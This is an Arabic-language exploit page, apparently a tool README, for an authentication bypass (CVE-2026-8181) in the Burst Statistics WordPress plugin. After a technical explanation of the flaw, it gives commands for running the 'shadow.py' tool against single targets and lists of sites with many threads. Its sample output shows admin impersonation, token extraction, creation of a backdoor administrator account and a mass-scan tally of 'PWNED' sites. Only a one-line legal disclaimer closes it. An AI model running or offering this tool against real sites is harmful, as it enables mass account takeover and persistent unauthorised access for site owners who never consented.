
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - تجاوز المصادقة للاستيلاء على حساب المسؤول
Burst Statistics | تجاوز المصادقة للاستيلاء على حساب المسؤول
إضافة Burst Statistics – إحصائيات WordPress الصديقة للخصوصية (بديل Google Analytics) لـ WordPress معرضة لتجاوز المصادقة في الإصدارات من 3.4.0 إلى 3.4.1.1. ويعود السبب إلى معالجة غير صحيحة لقيمة الإرجاع في دالة is_mainwp_authenticated() عند التحقق من كلمات مرور التطبيقات الواردة من ترويسة Authorization. تستدعي الدالة wp_authenticate_application_password(null, $username, $password) والتي تُرجع null (وليس WP_Error) عندما لا يكون لدى المستخدم المستهدف أي كلمات مرور تطبيقات مكوّنة. وبما أن الكود يتحقق فقط عبر is_wp_error()، فإنه يتابع استدعاء wp_set_current_user() — مما يمنح المهاجم صلاحيات إدارية كاملة طوال الطلب.
يتم تشغيل التجاوز أثناء plugins_loaded (الأولوية 9) عبر has_admin_access() في مرحلة إقلاع الإضافة، مما يعني أن انتحال هوية المستخدم يحدث قبل قيام WordPress REST API بتوزيع أي مسار — مما يسمح بالوصول إلى جميع نقاط نهاية WP Core (/wp/v2/users, /wp/v2/users/me, وغيرها) بصلاحيات مسؤول.
هذا يُمكّن المهاجمين غير المصادَق عليهم، ممن يعرفون اسم مستخدم مسؤول، من انتحال هوية ذلك المسؤول عبر تزويد أي كلمة مرور عشوائية للمصادقة الأساسية (Basic Authentication)، محققين تصعيد صلاحيات كامل والاستيلاء على حساب المسؤول.
~ درجة CVSS: 9.8 (حرجة)
~ متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ الإصدارات المتأثرة: 3.4.0 - 3.4.1.1
~ الإصدار المُصحَّح: 3.4.2
هدف واحد :
python3 shadow.py -u https://target.comهدف واحد مع اسم مستخدم معروف :
python3 shadow.py -u https://target.com -U adminأهداف جماعية :
python3 shadow.py -f targets.txt -t 20الوضع التفاعلي :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن باختبارها غير قانوني.